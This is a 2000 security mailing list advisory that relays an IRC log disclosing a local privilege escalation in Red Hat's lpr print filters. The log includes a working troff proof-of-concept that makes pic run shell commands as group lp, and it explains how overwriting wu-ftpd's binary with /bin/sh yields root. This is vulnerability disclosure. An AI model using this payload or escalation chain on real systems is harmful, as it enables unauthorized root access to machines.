Date: Thu, 26 Oct 2000 15:14:41 -0600
From: Kurt Seifried <seifried@SECURITYPORTAL.COM>
Subject: LSLID:2000102605 - lpr
To: LINUX-SECURITY@LISTSERV.SECURITYPORTAL.COM

LSLID:2000102605
==================

Details of an exploit against lpr-0.50-4 (at least); it also affects other systems that ship the same print filters.

URL      : http://crash.ihug.co.nz/~Sneuro/lpd-adv.txt
AFFECTS  : lpr-0.50-4 & earlier
SEVERITY : local ROOT possible.
SYNOPSIS : escalation of group permissions, leading to an exploit that yields every user except root. root is sometimes available as well. (wu-ftpd-2.6.0-14.6x binaries are owned by user bin, and can be overwritten allowing root access if wu-ftpd is installed.)

http://crash.ihug.co.nz/~Sneuro/lpd-adv.txt

This is a log of an advisory given in channel #roothat on irc.pulltheplug.com, October 16 2000.

!!!!!!!!!!!!!!!!!!!!!!!! start of log !!!!!!!!!!!!!!!!!!!!!!!

--> zen-parse (~empathy@p25-max6.dun.ihug.co.nz) has joined #roothat
--- Topic for #roothat is welcome to #roothat -- trivia in #trivia -- root yer printer and j00 get a new group of friends. and stuff.
--- Topic for #roothat set by zen-parse at Sun Oct 15 01:26:35 2000
--- noid gives channel operator status to zen-parse
<bdev> hey zen
<Safety> zen-parse
<Safety> lockdown
<zen-parse> lo all
<bdev> what's this topic all about then zen?
<zen-parse> new hole in lpr package for redhat
<bdev> and...
<bdev> ;]
<bdev> you releasing it ?
--> possem (star@203-173-242-165.nzl.ihugultra.co.nz) has joined #roothat
<zen-parse> [zen@continuity /tmp]$ id
<zen-parse> uid=500(zen) gid=500(zen) groups=500(zen)
<zen-parse> [zen@continuity /tmp]$ cat asdf
<zen-parse> .PS
<zen-parse> sh D/usr/bin/id>/tmp/yougetanyideasyetD
<zen-parse> .PF
<zen-parse> [zen@continuity /tmp]$ lpr asdf
<zen-parse> [zen@continuity /tmp]$ ls /tmp/yougetanyideasyet;cat /tmp/yougetanyideasyet
<zen-parse> uid=500(zen) gid=500(zen) groups=7(lp)
<zen-parse> [zen@continuity /tmp]$
<zen-parse> consider it released
<zen-parse> erm... missing a line...
<bdev> heh
<zen-parse> and should be ls -al /tmp/yougetanyideasyet;cat /tmp/yougetanyideasyet
<zen-parse> -rw-rw-rw-   1 zen      zen            39 Oct 16 22:08 /tmp/yougetanyideasyet
<zen-parse> as the output
<bdev> only gid lp ?
<Remmy> ehm
<Remmy> heh
<bdev> but: -r-sr-sr-x   1 root     lp          16292 Jan 10  2000 /usr/bin/lpr*
<-- schematic|ZzZz has quit (Ping timeout)
<zen-parse> thats not where the magic happens though.
<zen-parse> ;]
<zen-parse> needs a running lpd
<zen-parse> and a printer that does troff
<zen-parse> eg: PostScript
<zen-parse> cat /usr/lib/rhs/rhs-printfilters/troff-to-ps.fpi
<Remmy> zen...write a bugtraq advisory
<Remmy> but get really really stoned first.
<Remmy> hehe
<zen-parse> `grog -Tps -msafer $TMP_FILE`
<zen-parse> log this... use this as an advisory. ;]
<zen-parse> that is where the magic happens.
<zen-parse> grog is a perl script that selects the correct command line options for groff. groff can, if asked, run a variety of other programs, such as eqn (for equations), tbl (for tables) and pic (for compiling pictures).
<zen-parse> the -msafer means to disallow the call to any dangerous functions, such as executing a command or creating or modifying a file.
<zen-parse> However pic is called without that option being passed, even though it does have a -S switch, which runs it in safer mode.
<possem> zen-parse
<zen-parse> The lpd checks what type of file the file is
<zen-parse> with a program called file
<bdev> hmm
<Remmy> looks perty yummy
<zen-parse> the type of this file is troff or preprocessor...
<-- possem has quit (Quit: )
<zen-parse> so the daemon then hands it to the appropriate filters to print, one of them being /usr/lib/rhs/rhs-printfilters/troff-to-ps.fpi
<zen-parse> which contains the grog command, which causes groff to run pic on the file, and pic executes the file we specify as the user the file was printed by.
<zen-parse> with one exception.
<zen-parse> you have been set to have a list of groups which just contains one group. lp
<Remmy> hmm
<zen-parse> (btw: group lp can edit all the configuration files for lpd. lpd can run the commands as any user (except root).
<zen-parse> however, if u have wuftpd installed, there is a root exploit.
<zen-parse> -rwxr-xr-x   1 bin      bin        162608 Oct 14 19:36 /usr/sbin/in.ftpd
<zen-parse> lrwxrwxrwx   1 bin      bin             7 Sep 23 02:30 /usr/sbin/wu.ftpd -> in.ftpd
<zen-parse> gain user bin, and copy /bin/sh over in.ftpd
<Remmy> heh
<zen-parse> telnet to port 21, and you have root. so it is a root exploit on systems with wuftpd. and just every other uid on systems with lpd running.
<zen-parse> )
<bdev> heh, nice
<zen-parse> there also appears to be an error file attempting to be made just after privileges are dropped, but it has insufficient rights at that moment to actually succeed. the directory is owned by root, and only has lp write access because the lpd runs as root.
<zen-parse> um. you dats my advisory ;]
--- Users on #roothat: @zen-parse Safety Remmy +bdev eazyass omega|afk lockdown @noid Loki^moo _noah @Loki[f8] lucif3r tWiST3D
<zen-parse> -- Users on #roothat: @zen-parse Safety Remmy +bdev eazyass omega|afk lockdown @noid Loki^moo _noah @Loki[f8] lucif3r tWiST3D
<Remmy> ew
<zen-parse> -- zen-parse ;]
<Remmy> hehe
<Remmy> i like yer bugtraq posts better...
<Remmy> ya get all the leeto ascii in there and all...
<zen-parse> ok... now ima save the buffer and submit it to bugtraq ;]
<bdev> kewl
--> ThaReaper (Sir_Vomit@1Cust33.tnt50.chi5.da.uu.net) has joined #roothat
<bdev> that'd be a cool advisory

!!!!!!!!!!!!!!!!!!!!!!!!!! end of log !!!!!!!!!!!!!!!!!!!!!!!

Ob-ASCII

   /\/\     mee-errraaAAgghhhraher!
  = oo =
  / \()/
 / / __ \
  ||  ||

in memory of lucky.